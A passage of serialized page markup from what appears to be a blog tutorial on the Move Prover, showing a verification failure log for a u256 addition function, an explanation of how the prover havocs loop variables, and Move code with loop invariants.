errors\"\n}\n",[12898],{"type":26,"tag":130,"props":12899,"children":12900},{"__ignoreMap":7},[12901,12909,12916,12978,12999,13089,13157,13169,13177,13184,13191,13198,13216,13277,13294,13311,13383,13399,13407,13414,13464,13472,13489],{"type":26,"tag":137,"props":12902,"children":12903},{"class":5559,"line":5560},[12904],{"type":26,"tag":137,"props":12905,"children":12906},{"style":5601},[12907],{"type":32,"value":12908},"[...]\n",{"type":26,"tag":137,"props":12910,"children":12911},{"class":5559,"line":5412},[12912],{"type":26,"tag":137,"props":12913,"children":12914},{"emptyLinePlaceholder":18},[12915],{"type":32,"value":6276},{"type":26,"tag":137,"props":12917,"children":12918},{"class":5559,"line":5417},[12919,12924,12929,12934,12939,12944,12949,12954,12959,12964,12968,12973],{"type":26,"tag":137,"props":12920,"children":12921},{"style":5682},[12922],{"type":32,"value":12923},"error:",{"type":26,"tag":137,"props":12925,"children":12926},{"style":6837},[12927],{"type":32,"value":12928}," abort",{"type":26,"tag":137,"props":12930,"children":12931},{"style":6837},[12932],{"type":32,"value":12933}," not",{"type":26,"tag":137,"props":12935,"children":12936},{"style":6837},[12937],{"type":32,"value":12938}," covered",{"type":26,"tag":137,"props":12940,"children":12941},{"style":6837},[12942],{"type":32,"value":12943}," by",{"type":26,"tag":137,"props":12945,"children":12946},{"style":6837},[12947],{"type":32,"value":12948}," any",{"type":26,"tag":137,"props":12950,"children":12951},{"style":6837},[12952],{"type":32,"value":12953}," of",{"type":26,"tag":137,"props":12955,"children":12956},{"style":6837},[12957],{"type":32,"value":12958}," the",{"type":26,"tag":137,"props":12960,"children":12961},{"style":6837},[12962],{"type":32,"value":12963}," `",{"type":26,"tag":137,"props":12965,"children":12966},{"style":5682},[12967],{"type":32,"value":10910},{"type":26,"tag":137,"props":12969,"children":12970},{"style":6837},[12971],{"type":32,"value":12972},"`",{"type":26,"tag":137,"props":12974,"children":12975},{"style":5682},[12976],{"type":32,"value":12977}," clauses\n",{"type":26,"tag":137,"props":12979,"children":12980},{"class":5559,"line":5642},[12981,12986,12991,12995],{"type":26,"tag":137,"props":12982,"children":12983},{"style":5682},[12984],{"type":32,"value":12985},"╭",{"type":26,"tag":137,"props":12987,"children":12988},{"style":6837},[12989],{"type":32,"value":12990},"     spec",{"type":26,"tag":137,"props":12992,"children":12993},{"style":6837},[12994],{"type":32,"value":12170},{"type":26,"tag":137,"props":12996,"children":12997},{"style":6837},[12998],{"type":32,"value":5875},{"type":26,"tag":137,"props":13000,"children":13001},{"class":5559,"line":5745},[13002,13007,13012,13016,13020,13024,13028,13032,13036,13040,13044,13048,13053,13057,13061,13065,13069,13073,13077,13081,13085],{"type":26,"tag":137,"props":13003,"children":13004},{"style":5590},[13005],{"type":32,"value":13006},"|",{"type":26,"tag":137,"props":13008,"children":13009},{"style":5682},[13010],{"type":32,"value":13011},"         aborts_if",{"type":26,"tag":137,"props":13013,"children":13014},{"style":6837},[13015],{"type":32,"value":12293},{"type":26,"tag":137,"props":13017,"children":13018},{"style":5601},[13019],{"type":32,"value":165},{"type":26,"tag":137,"props":13021,"children":13022},{"style":5682},[13023],{"type":32,"value":41},{"type":26,"tag":137,"props":13025,"children":13026},{"style":5601},[13027],{"type":32,"value":5671},{"type":26,"tag":137,"props":13029,"children":13030},{"style":6837},[13031],{"type":32,"value":356},{"type":26,"tag":137,"props":13033,"children":13034},{"style":6837},[13035],{"type":32,"value":12293},{"type":26,"tag":137,"props":13037,"children":13038},{"style":5601},[13039],{"type":32,"value":165},{"type":26,"tag":137,"props":13041,"children":13042},{"style":5682},[13043],{"type":32,"value":2832},{"type":26,"tag":137,"props":13045,"children":13046},{"style":5601},[13047],{"type":32,"value":5671},{"type":26,"tag":137,"props":13049,"children":13050},{"style":5590},[13051],{"type":32,"value":13052},">",{"type":26,"tag":137,"props":13054,"children":13055},{"style":6837},[13056],{"type":32,"value":289},{"type":26,"tag":137,"props":13058,"children":13059},{"style":6837},[13060],{"type":32,"value":12249},{"type":26,"tag":137,"props":13062,"children":13063},{"style":5573},[13064],{"type":32,"value":12406},{"type":26,"tag":137,"props":13066,"children":13067},{"style":6837},[13068],{"type":32,"value":12249},{"type":26,"tag":137,"props":13070,"children":13071},{"style":5573},[13072],{"type":32,"value":12406},{"type":26,"tag":137,"props":13074,"children":13075},{"style":6837},[13076],{"type":32,"value":12249},{"type":26,"tag":137,"props":13078,"children":13079},{"style":5573},[13080],{"type":32,"value":12406},{"type":26,"tag":137,"props":13082,"children":13083},{"style":6837},[13084],{"type":32,"value":12249},{"type":26,"tag":137,"props":13086,"children":13087},{"style":5601},[13088],{"type":32,"value":5604},{"type":26,"tag":137,"props":13090,"children":13091},{"class":5559,"line":5850},[13092,13096,13101,13105,13109,13113,13117,13121,13125,13129,13133,13137,13141,13145,13149,13153],{"type":26,"tag":137,"props":13093,"children":13094},{"style":5590},[13095],{"type":32,"value":13006},{"type":26,"tag":137,"props":13097,"children":13098},{"style":5682},[13099],{"type":32,"value":13100},"         ensures",{"type":26,"tag":137,"props":13102,"children":13103},{"style":6837},[13104],{"type":32,"value":12293},{"type":26,"tag":137,"props":13106,"children":13107},{"style":5601},[13108],{"type":32,"value":165},{"type":26,"tag":137,"props":13110,"children":13111},{"style":5682},[13112],{"type":32,"value":11670},{"type":26,"tag":137,"props":13114,"children":13115},{"style":5601},[13116],{"type":32,"value":5671},{"type":26,"tag":137,"props":13118,"children":13119},{"style":6837},[13120],{"type":32,"value":11161},{"type":26,"tag":137,"props":13122,"children":13123},{"style":6837},[13124],{"type":32,"value":12293},{"type":26,"tag":137,"props":13126,"children":13127},{"style":5601},[13128],{"type":32,"value":165},{"type":26,"tag":137,"props":13130,"children":13131},{"style":5682},[13132],{"type":32,"value":41},{"type":26,"tag":137,"props":13134,"children":13135},{"style":5601},[13136],{"type":32,"value":5671},{"type":26,"tag":137,"props":13138,"children":13139},{"style":6837},[13140],{"type":32,"value":356},{"type":26,"tag":137,"props":13142,"children":13143},{"style":6837},[13144],{"type":32,"value":12293},{"type":26,"tag":137,"props":13146,"children":13147},{"style":5601},[13148],{"type":32,"value":165},{"type":26,"tag":137,"props":13150,"children":13151},{"style":5682},[13152],{"type":32,"value":2832},{"type":26,"tag":137,"props":13154,"children":13155},{"style":5601},[13156],{"type":32,"value":6430},{"type":26,"tag":137,"props":13158,"children":13159},{"class":5559,"line":5878},[13160,13164],{"type":26,"tag":137,"props":13161,"children":13162},{"style":5590},[13163],{"type":32,"value":13006},{"type":26,"tag":137,"props":13165,"children":13166},{"style":5601},[13167],{"type":32,"value":13168},"     }\n",{"type":26,"tag":137,"props":13170,"children":13171},{"class":5559,"line":5891},[13172],{"type":26,"tag":137,"props":13173,"children":13174},{"style":5682},[13175],{"type":32,"value":13176},"╰─────^\n",{"type":26,"tag":137,"props":13178,"children":13179},{"class":5559,"line":5909},[13180],{"type":26,"tag":137,"props":13181,"children":13182},{"emptyLinePlaceholder":18},[13183],{"type":32,"value":6276},{"type":26,"tag":137,"props":13185,"children":13186},{"class":5559,"line":5930},[13187],{"type":26,"tag":137,"props":13188,"children":13189},{"style":5601},[13190],{"type":32,"value":12908},{"type":26,"tag":137,"props":13192,"children":13193},{"class":5559,"line":5939},[13194],{"type":26,"tag":137,"props":13195,"children":13196},{"emptyLinePlaceholder":18},[13197],{"type":32,"value":6276},{"type":26,"tag":137,"props":13199,"children":13200},{"class":5559,"line":6191},[13201,13206,13211],{"type":26,"tag":137,"props":13202,"children":13203},{"style":5682},[13204],{"type":32,"value":13205}," at",{"type":26,"tag":137,"props":13207,"children":13208},{"style":6837},[13209],{"type":32,"value":13210}," ./sources/u256.move:316:",{"type":26,"tag":137,"props":13212,"children":13213},{"style":6837},[13214],{"type":32,"value":13215}," add\n",{"type":26,"tag":137,"props":13217,"children":13218},{"class":5559,"line":6208},[13219,13224,13229,13234,13238,13243,13247,13252,13257,13262,13267,13272],{"type":26,"tag":137,"props":13220,"children":13221},{"style":5682},[13222],{"type":32,"value":13223}," enter",{"type":26,"tag":137,"props":13225,"children":13226},{"style":6837},[13227],{"type":32,"value":13228}," loop,",{"type":26,"tag":137,"props":13230,"children":13231},{"style":6837},[13232],{"type":32,"value":13233}," variable",{"type":26,"tag":137,"props":13235,"children":13236},{"style":5601},[13237],{"type":32,"value":165},{"type":26,"tag":137,"props":13239,"children":13240},{"style":5682},[13241],{"type":32,"value":13242},"s",{"type":26,"tag":137,"props":13244,"children":13245},{"style":5601},[13246],{"type":32,"value":5671},{"type":26,"tag":137,"props":13248,"children":13249},{"style":6837},[13250],{"type":32,"value":13251},"carry,",{"type":26,"tag":137,"props":13253,"children":13254},{"style":6837},[13255],{"type":32,"value":13256}," i,",{"type":26,"tag":137,"props":13258,"children":13259},{"style":6837},[13260],{"type":32,"value":13261}," ret",{"type":26,"tag":137,"props":13263,"children":13264},{"style":6837},[13265],{"type":32,"value":13266}," havocked",{"type":26,"tag":137,"props":13268,"children":13269},{"style":6837},[13270],{"type":32,"value":13271}," and",{"type":26,"tag":137,"props":13273,"children":13274},{"style":6837},[13275],{"type":32,"value":13276}," reassigned\n",{"type":26,"tag":137,"props":13278,"children":13279},{"class":5559,"line":6225},[13280,13285,13289],{"type":26,"tag":137,"props":13281,"children":13282},{"style":5682},[13283],{"type":32,"value":13284},"     carry",{"type":26,"tag":137,"props":13286,"children":13287},{"style":6837},[13288],{"type":32,"value":5593},{"type":26,"tag":137,"props":13290,"children":13291},{"style":5626},[13292],{"type":32,"value":13293}," 54\n",{"type":26,"tag":137,"props":13295,"children":13296},{"class":5559,"line":6238},[13297,13302,13306],{"type":26,"tag":137,"props":13298,"children":13299},{"style":5682},[13300],{"type":32,"value":13301},"     i",{"type":26,"tag":137,"props":13303,"children":13304},{"style":6837},[13305],{"type":32,"value":5593},{"type":26,"tag":137,"props":13307,"children":13308},{"style":5626},[13309],{"type":32,"value":13310}," 3792\n",{"type":26,"tag":137,"props":13312,"children":13313},{"class":5559,"line":6247},[13314,13319,13323,13328,13332,13337,13342,13346,13351,13356,13360,13365,13370,13374,13379],{"type":26,"tag":137,"props":13315,"children":13316},{"style":5682},[13317],{"type":32,"value":13318},"     ret",{"type":26,"tag":137,"props":13320,"children":13321},{"style":6837},[13322],{"type":32,"value":5593},{"type":26,"tag":137,"props":13324,"children":13325},{"style":6837},[13326],{"type":32,"value":13327}," u256.U256{v0",{"type":26,"tag":137,"props":13329,"children":13330},{"style":6837},[13331],{"type":32,"value":5593},{"type":26,"tag":137,"props":13333,"children":13334},{"style":6837},[13335],{"type":32,"value":13336}," 26418,",{"type":26,"tag":137,"props":13338,"children":13339},{"style":6837},[13340],{"type":32,"value":13341}," v1",{"type":26,"tag":137,"props":13343,"children":13344},{"style":6837},[13345],{"type":32,"value":5593},{"type":26,"tag":137,"props":13347,"children":13348},{"style":6837},[13349],{"type":32,"value":13350}," 27938,",{"type":26,"tag":137,"props":13352,"children":13353},{"style":6837},[13354],{"type":32,"value":13355}," v2",{"type":26,"tag":137,"props":13357,"children":13358},{"style":6837},[13359],{"type":32,"value":5593},{"type":26,"tag":137,"props":13361,"children":13362},{"style":6837},[13363],{"type":32,"value":13364}," 6900,",{"type":26,"tag":137,"props":13366,"children":13367},{"style":6837},[13368],{"type":32,"value":13369}," v3",{"type":26,"tag":137,"props":13371,"children":13372},{"style":6837},[13373],{"type":32,"value":5593},{"type":26,"tag":137,"props":13375,"children":13376},{"style":5626},[13377],{"type":32,"value":13378}," 1999",{"type":26,"tag":137,"props":13380,"children":13381},{"style":6837},[13382],{"type":32,"value":6507},{"type":26,"tag":137,"props":13384,"children":13385},{"class":5559,"line":6270},[13386,13390,13395],{"type":26,"tag":137,"props":13387,"children":13388},{"style":5682},[13389],{"type":32,"value":13205},{"type":26,"tag":137,"props":13391,"children":13392},{"style":6837},[13393],{"type":32,"value":13394}," ./sources/u256.move:346:",{"type":26,"tag":137,"props":13396,"children":13397},{"style":6837},[13398],{"type":32,"value":13215},{"type":26,"tag":137,"props":13400,"children":13401},{"class":5559,"line":6279},[13402],{"type":26,"tag":137,"props":13403,"children":13404},{"style":5682},[13405],{"type":32,"value":13406},"     ABORTED\n",{"type":26,"tag":137,"props":13408,"children":13409},{"class":5559,"line":6288},[13410],{"type":26,"tag":137,"props":13411,"children":13412},{"emptyLinePlaceholder":18},[13413],{"type":32,"value":6276},{"type":26,"tag":137,"props":13415,"children":13416},{"class":5559,"line":6355},[13417,13422,13427,13431,13436,13441,13446,13450,13455,13459],{"type":26,"tag":137,"props":13418,"children":13419},{"style":5682},[13420],{"type":32,"value":13421},"FAILURE",{"type":26,"tag":137,"props":13423,"children":13424},{"style":6837},[13425],{"type":32,"value":13426}," proving",{"type":26,"tag":137,"props":13428,"children":13429},{"style":5626},[13430],{"type":32,"value":7104},{"type":26,"tag":137,"props":13432,"children":13433},{"style":6837},[13434],{"type":32,"value":13435}," modules",{"type":26,"tag":137,"props":13437,"children":13438},{"style":6837},[13439],{"type":32,"value":13440}," from",{"type":26,"tag":137,"props":13442,"children":13443},{"style":6837},[13444],{"type":32,"value":13445}," package",{"type":26,"tag":137,"props":13447,"children":13448},{"style":6837},[13449],{"type":32,"value":12963},{"type":26,"tag":137,"props":13451,"children":13452},{"style":5682},[13453],{"type":32,"value":13454},"u256",{"type":26,"tag":137,"props":13456,"children":13457},{"style":6837},[13458],{"type":32,"value":12972},{"type":26,"tag":137,"props":13460,"children":13461},{"style":5601},[13462],{"type":32,"value":13463}," in 9.143s\n",{"type":26,"tag":137,"props":13465,"children":13466},{"class":5559,"line":6363},[13467],{"type":26,"tag":137,"props":13468,"children":13469},{"style":5601},[13470],{"type":32,"value":13471},"{\n",{"type":26,"tag":137,"props":13473,"children":13474},{"class":5559,"line":6393},[13475,13480,13484],{"type":26,"tag":137,"props":13476,"children":13477},{"style":5682},[13478],{"type":32,"value":13479},"    \"Error\"",{"type":26,"tag":137,"props":13481,"children":13482},{"style":5682},[13483],{"type":32,"value":7072},{"type":26,"tag":137,"props":13485,"children":13486},{"style":6837},[13487],{"type":32,"value":13488}," \"Move Prover failed: exiting with verification errors\"\n",{"type":26,"tag":137,"props":13490,"children":13491},{"class":5559,"line":6401},[13492],{"type":26,"tag":137,"props":13493,"children":13494},{"style":5601},[13495],{"type":32,"value":6507},{"type":26,"tag":35,"props":13497,"children":13498},{},[13499,13501,13506],{"type":32,"value":13500},"The prover is telling us that proving failed because the abort was not covered by our ",{"type":26,"tag":130,"props":13502,"children":13504},{"className":13503},[],[13505],{"type":32,"value":10910},{"type":32,"value":13507}," clauses. But there is no other abort situation that we have to cover, right?",{"type":26,"tag":35,"props":13509,"children":13510},{},[13511,13513,13519],{"type":32,"value":13512},"If we keep reading the error output, we will encounter the somewhat cryptic message: ",{"type":26,"tag":130,"props":13514,"children":13516},{"className":13515},[],[13517],{"type":32,"value":13518},"ret havocked and reassigned",{"type":32,"value":470},{"type":26,"tag":35,"props":13521,"children":13522},{},[13523],{"type":32,"value":13524},"What does this mean?",{"type":26,"tag":35,"props":13526,"children":13527},{},[13528,13530,13537],{"type":32,"value":13529},"By diving into the Move Prover source, we find a ",{"type":26,"tag":41,"props":13531,"children":13534},{"href":13532,"rel":13533},"https://github.com/move-language/move/blob/e0dafc5cf3efe4c4e61411f10cdf0f379a36673c/language/move-prover/bytecode/src/loop_analysis.rs#L94",[45],[13535],{"type":32,"value":13536},"likely suspect",{"type":32,"value":13538},". The prover attempts to prove all loops with induction!",{"type":26,"tag":35,"props":13540,"children":13541},{},[13542],{"type":32,"value":13543},"More formally, it will translate the loop into two key steps, following the classic steps of a proof by induction",{"type":26,"tag":4820,"props":13545,"children":13546},{},[13547,13552],{"type":26,"tag":3430,"props":13548,"children":13549},{},[13550],{"type":32,"value":13551},"Base Case: Asserting the loop invariant holds at the start of loop execution",{"type":26,"tag":3430,"props":13553,"children":13554},{},[13555],{"type":32,"value":13556},"Inductive Step: Assume the invariant, execute the loop body, and assert that the invariant still holds",{"type":26,"tag":35,"props":13558,"children":13559},{},[13560,13562,13567,13569,13575,13576,13582,13583,13588,13590,13595],{"type":32,"value":13561},"The loop prover will also ",{"type":26,"tag":84,"props":13563,"children":13564},{},[13565],{"type":32,"value":13566},"havoc, or assign random values to, all variables written to inside the loop",{"type":32,"value":13568},". Going back to the log message, this implies that the variables ",{"type":26,"tag":130,"props":13570,"children":13572},{"className":13571},[],[13573],{"type":32,"value":13574},"carry",{"type":32,"value":1108},{"type":26,"tag":130,"props":13577,"children":13579},{"className":13578},[],[13580],{"type":32,"value":13581},"ret",{"type":32,"value":3339},{"type":26,"tag":130,"props":13584,"children":13586},{"className":13585},[],[13587],{"type":32,"value":506},{"type":32,"value":13589}," have been havocked, or assigned random values. This also explains why the input and output of ",{"type":26,"tag":130,"props":13591,"children":13593},{"className":13592},[],[13594],{"type":32,"value":12227},{"type":32,"value":13596}," makes no sense.",{"type":26,"tag":35,"props":13598,"children":13599},{},[13600],{"type":32,"value":13601},"More concretely, the loop analysis translates into the following steps.",{"type":26,"tag":4820,"props":13603,"children":13604},{},[13605,13610,13615,13620,13625,13630],{"type":26,"tag":3430,"props":13606,"children":13607},{},[13608],{"type":32,"value":13609},"Assert the loop invariant",{"type":26,"tag":3430,"props":13611,"children":13612},{},[13613],{"type":32,"value":13614},"Havoc all modified variables",{"type":26,"tag":3430,"props":13616,"children":13617},{},[13618],{"type":32,"value":13619},"Assume the loop invariant",{"type":26,"tag":3430,"props":13621,"children":13622},{},[13623],{"type":32,"value":13624},"Assume the loop guard (the code inside the while condition)",{"type":26,"tag":3430,"props":13626,"children":13627},{},[13628],{"type":32,"value":13629},"Run the loop body",{"type":26,"tag":3430,"props":13631,"children":13632},{},[13633],{"type":32,"value":13609},{"type":26,"tag":35,"props":13635,"children":13636},{},[13637],{"type":32,"value":13638},"There are two approaches to dealing with loops.",{"type":26,"tag":35,"props":13640,"children":13641},{},[13642],{"type":32,"value":13643},"The first would be to specify a loop invariant.",{"type":26,"tag":35,"props":13645,"children":13646},{},[13647,13649,13656],{"type":32,"value":13648},"In order to specify the loop invariant, we need to use some special syntax, as we explored briefly in our ",{"type":26,"tag":41,"props":13650,"children":13653},{"href":13651,"rel":13652},"https://osec.io/blog/tutorials/2022-09-06-move-introduction/",[45],[13654],{"type":32,"value":13655},"previous post",{"type":32,"value":470},{"type":26,"tag":5512,"props":13658,"children":13660},{"code":13659,"language":5551,"meta":7,"className":5552,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) {\n      vector::push_back(\n          &mut amounts_times_coins,\n          (*vector::borrow(&input, (i as u64)) as u128) * (n_coins as u128)\n      );\n      i = i + 1;\n  };\n",[13661],{"type":26,"tag":130,"props":13662,"children":13663},{"__ignoreMap":7},[13664,13676,13687,13723,13746,13829,13836,13860,13868,13888,13908,13999,14006,14034],{"type":26,"tag":137,"props":13665,"children":13666},{"class":5559,"line":5560},[13667,13672],{"type":26,"tag":137,"props":13668,"children":13669},{"style":5610},[13670],{"type":32,"value":13671},"  while",{"type":26,"tag":137,"props":13673,"children":13674},{"style":5601},[13675],{"type":32,"value":11118},{"type":26,"tag":137,"props":13677,"children":13678},{"class":5559,"line":5412},[13679,13683],{"type":26,"tag":137,"props":13680,"children":13681},{"style":5584},[13682],{"type":32,"value":11515},{"type":26,"tag":137,"props":13684,"children":13685},{"style":5601},[13686],{"type":32,"value":5875},{"type":26,"tag":137,"props":13688,"children":13689},{"class":5559,"line":5417},[13690,13695,13699,13703,13707,13711,13715,13719],{"type":26,"tag":137,"props":13691,"children":13692},{"style":5584},[13693],{"type":32,"value":13694},"          invariant",{"type":26,"tag":137,"props":13696,"children":13697},{"style":5682},[13698],{"type":32,"value":11143},{"type":26,"tag":137,"props":13700,"children":13701},{"style":5601},[13702],{"type":32,"value":165},{"type":26,"tag":137,"props":13704,"children":13705},{"style":5584},[13706],{"type":32,"value":11152},{"type":26,"tag":137,"props":13708,"children":13709},{"style":5601},[13710],{"type":32,"value":5671},{"type":26,"tag":137,"props":13712,"children":13713},{"style":5590},[13714],{"type":32,"value":11161},{"type":26,"tag":137,"props":13716,"children":13717},{"style":5584},[13718],{"type":32,"value":5988},{"type":26,"tag":137,"props":13720,"children":13721},{"style":5601},[13722],{"type":32,"value":5604},{"type":26,"tag":137,"props":13724,"children":13725},{"class":5559,"line":5642},[13726,13730,13734,13738,13742],{"type":26,"tag":137,"props":13727,"children":13728},{"style":5584},[13729],{"type":32,"value":13694},{"type":26,"tag":137,"props":13731,"children":13732},{"style":5584},[13733],{"type":32,"value":5988},{"type":26,"tag":137,"props":13735,"children":13736},{"style":5590},[13737],{"type":32,"value":10782},{"type":26,"tag":137,"props":13739,"children":13740},{"style":5584},[13741],{"type":32,"value":11072},{"type":26,"tag":137,"props":13743,"children":13744},{"style":5601},[13745],{"type":32,"value":5604},{"type":26,"tag":137,"props":13747,"children":13748},{"class":5559,"line":5745},[13749,13753,13757,13761,13765,13769,13773,13777,13781,13785,13789,13793,13797,13801,13805,13809,13813,13817,13821,13825],{"type":26,"tag":137,"props":13750,"children":13751},{"style":5584},[13752],{"type":32,"value":13694},{"type":26,"tag":137,"props":13754,"children":13755},{"style":5584},[13756],{"type":32,"value":11204},{"type":26,"tag":137,"props":13758,"children":13759},{"style":5584},[13760],{"type":32,"value":11209},{"type":26,"tag":137,"props":13762,"children":13763},{"style":5573},[13764],{"type":32,"value":5623},{"type":26,"tag":137,"props":13766,"children":13767},{"style":5626},[13768],{"type":32,"value":5629},{"type":26,"tag":137,"props":13770,"children":13771},{"style":5590},[13772],{"type":32,"value":5634},{"type":26,"tag":137,"props":13774,"children":13775},{"style":5584},[13776],{"type":32,"value":506},{"type":26,"tag":137,"props":13778,"children":13779},{"style":5590},[13780],{"type":32,"value":7072},{"type":26,"tag":137,"props":13782,"children":13783},{"style":5584},[13784],{"type":32,"value":11007},{"type":26,"tag":137,"props":13786,"children":13787},{"style":5601},[13788],{"type":32,"value":3016},{"type":26,"tag":137,"props":13790,"children":13791},{"style":5584},[13792],{"type":32,"value":11242},{"type":26,"tag":137,"props":13794,"children":13795},{"style":5601},[13796],{"type":32,"value":11247},{"type":26,"tag":137,"props":13798,"children":13799},{"style":5590},[13800],{"type":32,"value":11161},{"type":26,"tag":137,"props":13802,"children":13803},{"style":5584},[13804],{"type":32,"value":11256},{"type":26,"tag":137,"props":13806,"children":13807},{"style":5601},[13808],{"type":32,"value":3016},{"type":26,"tag":137,"props":13810,"children":13811},{"style":5584},[13812],{"type":32,"value":11242},{"type":26,"tag":137,"props":13814,"children":13815},{"style":5601},[13816],{"type":32,"value":11247},{"type":26,"tag":137,"props":13818,"children":13819},{"style":5590},[13820],{"type":32,"value":7152},{"type":26,"tag":137,"props":13822,"children":13823},{"style":5584},[13824],{"type":32,"value":11072},{"type":26,"tag":137,"props":13826,"children":13827},{"style":5601},[13828],{"type":32,"value":5604},{"type":26,"tag":137,"props":13830,"children":13831},{"class":5559,"line":5850},[13832],{"type":26,"tag":137,"props":13833,"children":13834},{"style":5601},[13835],{"type":32,"value":11507},{"type":26,"tag":137,"props":13837,"children":13838},{"class":5559,"line":5878},[13839,13844,13848,13852,13856],{"type":26,"tag":137,"props":13840,"children":13841},{"style":5601},[13842],{"type":32,"value":13843},"      (",{"type":26,"tag":137,"props":13845,"children":13846},{"style":5584},[13847],{"type":32,"value":506},{"type":26,"tag":137,"props":13849,"children":13850},{"style":5590},[13851],{"type":32,"value":11305},{"type":26,"tag":137,"props":13853,"children":13854},{"style":5584},[13855],{"type":32,"value":11072},{"type":26,"tag":137,"props":13857,"children":13858},{"style":5601},[13859],{"type":32,"value":5742},{"type":26,"tag":137,"props":13861,"children":13862},{"class":5559,"line":5891},[13863],{"type":26,"tag":137,"props":13864,"children":13865},{"style":5601},[13866],{"type":32,"value":13867},"  }) {\n",{"type":26,"tag":137,"props":13869,"children":13870},{"class":5559,"line":5909},[13871,13876,13880,13884],{"type":26,"tag":137,"props":13872,"children":13873},{"style":5601},[13874],{"type":32,"value":13875},"      vector",{"type":26,"tag":137,"props":13877,"children":13878},{"style":5590},[13879],{"type":32,"value":6072},{"type":26,"tag":137,"props":13881,"children":13882},{"style":5682},[13883],{"type":32,"value":11338},{"type":26,"tag":137,"props":13885,"children":13886},{"style":5601},[13887],{"type":32,"value":6054},{"type":26,"tag":137,"props":13889,"children":13890},{"class":5559,"line":5930},[13891,13896,13900,13904],{"type":26,"tag":137,"props":13892,"children":13893},{"style":5590},[13894],{"type":32,"value":13895},"          &",{"type":26,"tag":137,"props":13897,"children":13898},{"style":5573},[13899],{"type":32,"value":6325},{"type":26,"tag":137,"props":13901,"children":13902},{"style":5584},[13903],{"type":32,"value":11007},{"type":26,"tag":137,"props":13905,"children":13906},{"style":5601},[13907],{"type":32,"value":6099},{"type":26,"tag":137,"props":13909,"children":13910},{"class":5559,"line":5939},[13911,13915,13919,13923,13927,13931,13935,13939,13943,13947,13951,13955,13959,13963,13967,13971,13975,13979,13983,13987,13991,13995],{"type":26,"tag":137,"props":13912,"children":13913},{"style":5601},[13914],{"type":32,"value":11296},{"type":26,"tag":137,"props":13916,"children":13917},{"style":5590},[13918],{"type":32,"value":7152},{"type":26,"tag":137,"props":13920,"children":13921},{"style":5601},[13922],{"type":32,"value":11379},{"type":26,"tag":137,"props":13924,"children":13925},{"style":5590},[13926],{"type":32,"value":6072},{"type":26,"tag":137,"props":13928,"children":13929},{"style":5682},[13930],{"type":32,"value":11388},{"type":26,"tag":137,"props":13932,"children":13933},{"style":5601},[13934],{"type":32,"value":165},{"type":26,"tag":137,"props":13936,"children":13937},{"style":5590},[13938],{"type":32,"value":5694},{"type":26,"tag":137,"props":13940,"children":13941},{"style":5584},[13942],{"type":32,"value":10952},{"type":26,"tag":137,"props":13944,"children":13945},{"style":5601},[13946],{"type":32,"value":11405},{"type":26,"tag":137,"props":13948,"children":13949},{"style":5584},[13950],{"type":32,"value":506},{"type":26,"tag":137,"props":13952,"children":13953},{"style":5573},[13954],{"type":32,"value":11414},{"type":26,"tag":137,"props":13956,"children":13957},{"style":6009},[13958],{"type":32,"value":8445},{"type":26,"tag":137,"props":13960,"children":13961},{"style":5601},[13962],{"type":32,"value":11423},{"type":26,"tag":137,"props":13964,"children":13965},{"style":5573},[13966],{"type":32,"value":11428},{"type":26,"tag":137,"props":13968,"children":13969},{"style":6009},[13970],{"type":32,"value":11433},{"type":26,"tag":137,"props":13972,"children":13973},{"style":5601},[13974],{"type":32,"value":5671},{"type":26,"tag":137,"props":13976,"children":13977},{"style":5590},[13978],{"type":32,"value":7152},{"type":26,"tag":137,"props":13980,"children":13981},{"style":5601},[13982],{"type":32,"value":4625},{"type":26,"tag":137,"props":13984,"children":13985},{"style":5584},[13986],{"type":32,"value":11450},{"type":26,"tag":137,"props":13988,"children":13989},{"style":5573},[13990],{"type":32,"value":11414},{"type":26,"tag":137,"props":13992,"children":13993},{"style":6009},[13994],{"type":32,"value":11433},{"type":26,"tag":137,"props":13996,"children":13997},{"style":5601},[13998],{"type":32,"value":5742},{"type":26,"tag":137,"props":14000,"children":14001},{"class":5559,"line":6191},[14002],{"type":26,"tag":137,"props":14003,"children":14004},{"style":5601},[14005],{"type":32,"value":9350},{"type":26,"tag":137,"props":14007,"children":14008},{"class":5559,"line":6208},[14009,14014,14018,14022,14026,14030],{"type":26,"tag":137,"props":14010,"children":14011},{"style":5584},[14012],{"type":32,"value":14013},"      i",{"type":26,"tag":137,"props":14015,"children":14016},{"style":5590},[14017],{"type":32,"value":5593},{"type":26,"tag":137,"props":14019,"children":14020},{"style":5584},[14021],{"type":32,"value":5988},{"type":26,"tag":137,"props":14023,"children":14024},{"style":5590},[14025],{"type":32,"value":11491},{"type":26,"tag":137,"props":14027,"children":14028},{"style":5626},[14029],{"type":32,"value":7104},{"type":26,"tag":137,"props":14031,"children":14032},{"style":5601},[14033],{"type":32,"value":5604},{"type":26,"tag":137,"props":14035,"children":14036},{"class":5559,"line":6225},[14037],{"type":26,"tag":137,"props":14038,"children":14039},{"style":5601},[14040],{"type":32,"value":14041},"  };\n",{"type":26,"tag":35,"props":14043,"children":14044},{},[14045,14047,14053,14055,14060,14062,14068],{"type":32,"value":14046},"In this case, the brackets specify the loop invariant for the ",{"type":26,"tag":130,"props":14048,"children":14050},{"className":14049},[],[14051],{"type":32,"value":14052},"while",{"type":32,"value":14054}," loop. Note that because the loop invariant executes ",{"type":26,"tag":762,"props":14056,"children":14057},{},[14058],{"type":32,"value":14059},"after",{"type":32,"value":14061}," the loop guard, so we need to account for an extra step with ",{"type":26,"tag":130,"props":14063,"children":14065},{"className":14064},[],[14066],{"type":32,"value":14067},"i \u003C= n_coins",{"type":32,"value":470},{"type":26,"tag":5512,"props":14070,"children":14072},{"code":14071,"language":5551,"meta":7,"className":5552,"style":7},"  while ({\n      spec {\n          invariant len(amounts_times_coins) == i;\n          invariant i \u003C= n_coins;\n          invariant forall j in 0..i: amounts_times_coins[j] == input[j] * n_coins;\n      };\n      (i \u003C n_coins)\n  }) 